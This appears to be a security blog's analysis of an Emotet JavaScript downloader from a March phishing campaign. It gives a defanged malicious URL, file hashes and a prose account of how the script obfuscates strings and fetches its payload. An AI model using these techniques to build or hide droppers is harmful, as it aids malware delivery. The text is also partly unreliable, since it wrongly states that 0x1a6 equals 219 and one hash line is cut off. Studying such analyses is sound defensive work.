Emotet is an advanced, modular downloader that primarily functions as a dropper of other opportunistic malware variants. Emotet continues to be among the most widely distributed and destructive malware variants affecting organizations throughout the private and public sectors. In a previous joint Technical Alert, US-CERT identified that Emotet infections have cost organizations up to $1 million per incident to remediate.
Many crimeware variants are effectively mitigated by technical email controls, however, Emotet campaigns consistently evade such controls, are delivered to end users, and defenders must rely on secondary controls to block these attacks. This variant is tracked closely by researchers and defenders due to its destructive and evasive capabilities. Multiple messages were delivered on March 25th and the following week that demonstrated a tactical evolution.
While the pretext’s of Emotet phishing emails primarily remain payment or invoice-themed, there has been an update to several message templates that include a digital signature attachment, which is designed to increase the sense of legitimacy.
At this point if the download is successful, the victim system is infected with Emotet and may be leveraged for any of its infostealing or spamming capabilities in addition to the loading of secondary payloads.
The script here is structured into 5 primary functions and uses several clear text strings in an array to construct the commands. Beyond the array, the primary obfuscation technique is a simple variable/function renaming tactic where the object identifiers are all converted to random hexadecimal strings. The actors have possibly used some form of automated obfuscation such as the tool available at this site to accomplish this result. Brief testing confirmed that similar output results in consistent naming conventions as evidence in the malware sample. All of the replaced hexadecimal names include the underscore “_” character in front of the string. Versions of these file-types from later campaigns also included the same character in the filename (ex: 2019_03_US_ACC5829121550658987___1442635324.zip). The file we are examining is the one that would have been downloaded on 3-25:
- URL: hxxp://certs365[.]co[.]uk/cgi-bin/0597655/MhGd-XDEdG_ikZAZg-6s/
- SHA-256 (archive): 1836015128231d2aed428b7da5220f23b49cc25bde5f0b60add0e31730c2b58c (archic
- File Name: US238979231912290.zip
- SHA-256 (script): FA24322FB07A7DF35F0BE3C5F4E72F0B9456CE73F2049EC9FFC0B97DCE5A4FBE
- File Name: US238979231912290.js
The unmodified script is quite a mess, but we can use a beautifier tool that will help make sense of what is going on here. One thing that immediately stands out is the clear text strings, which will make the de-obfuscation a much easier process overall. For additional details, see an analysis of a similar script that was conducted by Cofense researchers who cleaned up several more portions of a script with comments and functional replacements of the object identifiers.
The script begins with an initialized variable that holds an array of elements. The strings that make up the array elements will be called by the remaining functions to build the various commands and URLs for the stage 2 payload. The text for the decoy pop-up noted before is also stored here. The array is obfuscated by a series of “shuffling” operations that include: “push” adds an item to the end of the array, “shift” removes the first item, “–“ and “++” are the decrement and increment operators, respectively. These operators along with “0x1a6” hex value which = 219, and finally shuffles the array 219 times.
The next section of script starts the primary functions and the first two main functions are responsible for initiating the download of the payload and establishing a loop through the 5 hardcoded URLs. Once again, strings from the array elements are called by obfuscated variable/object names that are encoded with meaningless hexadecimal values, but set to hex-encoded values that call the positions from the array index. The functions verify the response and leverage an adodb.stream object to pull down the payload form one of the looped URLs. Four of the URL locations are included in the plaintext array, and one is inside the function itself.
The final primary function is the one responsible for kicking off the script’s operations.
Conclusion — Recommendations